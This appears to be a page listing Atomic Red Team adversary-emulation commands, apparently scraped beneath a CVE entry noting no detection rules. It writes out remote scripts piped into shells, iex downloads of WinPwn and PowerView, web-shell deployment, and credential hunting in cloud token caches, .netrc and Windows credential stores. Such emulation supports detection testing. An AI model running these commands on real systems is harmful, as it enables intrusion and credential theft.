#{soaphound_path} --user #{user} --password #{password} --domain #{domain} --dc #{dc} --bhdump --cachefilename #{cachefilename} --outputdirectory #{outputdirectory}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
ldapdomaindump -u #{username} -p #{password} #{target_ip} -o /tmp/T1087
ldapsearch -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{user} -w #{password} -b "CN=Users,DC=#{domain},DC=#{top_level_domain}" -s sub -a always -z 1000 dn
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc admincountdmp #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc exchaddresses #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=person) #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties
Invoke-Expression "#{adrecon_path}"
([adsisearcher]"objectcategory=user").FindAll(); ([adsisearcher]"objectcategory=user").FindOne()
Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}
net user administrator /domain
(([adsisearcher]'(objectcategory=organizationalunit)').FindAll()).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] OU Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
(([adsisearcher]'').SearchRooT).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] Domain Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
net user /domain
net group /domain
net user /domain
get-localgroupmember -group Users
get-aduser -filter *
query user /SERVER:#{computer_name}
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose
cd "PathToAtomicsFolder\..\ExternalPayloads"
.\kerbrute.exe userenum -d #{Domain} --dc #{DomainController} "PathToAtomicsFolder\..\ExternalPayloads\username.txt"
Get-ADComputer #{hostname} -Properties *
Get-adcomputer -SearchScope subtree -filter "name -like '*'" -Properties *
Get-ADComputer #{hostname} -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" *
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$target = $env:LOGONSERVER
$target = $target.Trim("\\")
$IpAddress = [System.Net.Dns]::GetHostAddresses($target) | select IPAddressToString -ExpandProperty IPAddressToString
wmic.exe /node:$IpAddress process call create 'wevtutil epl Security C:\\ntlmusers.evtx /q:\"Event[System[(EventID=4776)]]"'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
generaldomaininfo -noninteractive -consoleoutput
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.